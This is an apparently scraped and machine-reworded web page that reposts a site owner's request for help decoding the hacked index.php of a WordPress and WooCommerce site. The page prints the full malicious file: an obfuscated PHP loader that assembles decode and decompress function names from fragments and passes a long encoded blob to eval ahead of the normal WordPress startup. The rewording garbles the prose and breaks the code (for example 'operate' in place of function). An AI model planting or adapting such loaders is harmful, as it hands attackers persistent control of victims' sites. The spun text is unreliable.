Saturday, February 4, 2023
HomeWordPress DevelopmentWordpress index.php & .htaccess hacked to switch itself, please assist decode
WordPress Development

WordPress index.php & .htaccess hacked to switch itself, please assist decode

Admin
By Admin
0
1


I’m not a savvy programmer. I construct web site enterprise based mostly on wordpress + woocommerce. Not too long ago, my consumer’s web site was attacked as a result of one of many administrator’s weak password. Now the index.php and .htaccess is hacked and is including malwares on day by day foundation. Since i am not a programmer, please assist me to repair this downside in a extra use-friendly rationalization.

My analysis and makes an attempt to this point:

  • At the very least I understand how to wash up malware recordsdata by taking a look at bizarre php recordsdata evaluating to a different WP web site that is clear. Discovered most of it by means of wordfence scan (and principally analysis on-line).
  • Discovered that malwares are sometimes created with a base file (normally an .ico or .png file that comprises malicious code), and that contents are sometimes written in a “php base64 decode”.
  • First day hacked, I used to be in a position to clear up the malicious recordsdata, permitting me to open “/wp-admin/plugins.php” web page and reinstall wordfence that was uninstalled by hacker, in order that wordfence can assist me discover the remainder of malicious recordsdata to delete.
  • Clear up any deserted plugins, outdated theme recordsdata, modified all administrator passwords, modified “mysql database password” in “wp-config.php”

On the second day, BAM. Web site is hacked once more. Malware is again once more. I would love to have the ability to resolve this myself earlier than counting on paid providers / software program (akin to malcare paid, wordfence premium, or sucuri), in order to enhance on my ability although i haven’t got background in programming.

So any good souls on the market keen to assist me, that’d be very appreciated. Please begin by serving to me decode this (hacked index.php):

<?php $HX1Shcp
= operate ($UIx){$fgY = "A4GS";$LtCj0='L'.
$fgY[(15 -22+10) /3].   't' .$fgY[(69 -61- 2) /2].  ((61- 53 - 6) / 2).$fgY[(69 - 51 -10) /4].
$fgY[(55- 59 + 4)/3]
. 'j'   .'C'    .'';
  return $LtCj0($UIx);};     
      
    
$yIFICSON='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';$KWI5 = operate($XNnC8cRQ  ){$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4]    ;$FTxuK1
.=      'a' .$ucId7fM[(87- 85+ 2) / 2].
'E' .((108 - 90 + 6)/ 4).((20 - 8)/3)   . '_'   ;
$FTxuK1 .= $ucId7fM[(32 -22 + 6) /4]    .$ucId7fM[(107- 83 - 6) / 6] . 'C'.$ucId7fM[(102 - 79+ 2) / 5];$FTxuK1  .=  $ucId7fM[(60-42)/ 3].$ucId7fM[(99 -78 - 6) / 5].
'';
return $FTxuK1($XNnC8cRQ);          
}; $txgbNkAqm= operate ($__w )
{$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2] . 'z'.  $eRYBM[(50 -50)/3]  .
'N'.    'F' . $eRYBM[(15- 9) / 3].'A' .
't'. 'e'
.'';         
    return $YzU($__w);  };          

$KWI5   = operate($XNnC8cRQ
){$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4]    ;
$FTxuK1 .= 'a'.$ucId7fM[(87- 85+ 2) / 2]    .
'E'.((108 - 90 + 6)/ 4).
((20 - 8)/3) .
'_' ; $FTxuK1   .=  $ucId7fM[(32 -22 + 6) /4] .$ucId7fM[(107- 83 - 6) / 6].'C' .$ucId7fM[(102 - 79+ 2) / 5]
;   $FTxuK1
.=  $ucId7fM[(60-42)/ 3]
.
$ucId7fM[(99 -78 - 6) / 5].
'';  
return $FTxuK1($XNnC8cRQ);  }; $yIFICSON
=$HX1Shcp($yIFICSON);$yIFICSON  = $KWI5($yIFICSON);
 $VuySiMk= operate($T5Sv6RW3){
return "u_2r7GQdhyKvNLctCZIm5iS0KQLZsO_HWUPY7uxSgUkecRKgB";
};
$txgbNkAqm=
operate($__w   )
{$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2] .'z'    .$eRYBM[(50 -50)/3].'N' .
'F'.    $eRYBM[(15- 9) / 3] .'A'
. 't'.'e'. '';
return $YzU($__w);  };$yIFICSON =   $txgbNkAqm($yIFICSON); 
operate    ODlh(){
return "Ps8YoWHCAf7hnVPAdQgQZ0TIGia8V9";}
 
 operate  Zci
($dyTpp8g){$Hye = "1_trs";$YoB=$Hye[(63 -45-10) / 2]
.   'T'.$Hye[(36-31 +10) /5]    . $Hye[(34- 32)/ 2] . $Hye[(75-56-1)/6] .
'O' ;   $YoB .= $Hye[(62 - 60 +2)/ 2] .((95 -89) /6).((36 -18)/6)   ;
$YoB.=
    ''; return $YoB($dyTpp8g);  }   
    operate 
dqdwwy ($egUUErn_l
,$LuZw3o)
{    $_Bb8="ubZPp4NG9KU9s8uTPoK";
     return $_Bb8;
}operate   iJPzSr5
($qshhk1){$QgSV1iWj7 = "Vb79";$cCLs7_=((43 - 25 +3) / 3);   $cCLs7_.= $QgSV1iWj7[(57-50 - 7)/ 3].
'h'
. 'b' .$QgSV1iWj7[(19 -16) / 3] . $QgSV1iWj7[(34 -27+5) / 4]    ;   $cCLs7_ .=  's'
.
'2' . 'F'; $cCLs7_ .=    '';return $cCLs7_;
 
    }

operate    l4tS1Gajc
($xPkyYU    ) {return  iJPzSr5('')
.$xPkyYU;}$yIFICSON =
Zci($yIFICSON);eVal ($yIFICSON); ?><?php  outline('WP_USE_THEMES', true );require(__DIR__.  '/wp-blog-header.php' ); ?>

Previous articleHow multicloud adjustments devops | InfoWorld
Admin
Adminhttps://www.handla.it
RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Load more

Recent Comments

ABOUT US

handla.it is your computer, laptop, software and cyber security website. We provide you with the latest breaking news and videos straight from the computer industry.

POPULAR POSTS

POPULAR CATEGORY

copyright 2022 © handla.it. All rights reserved.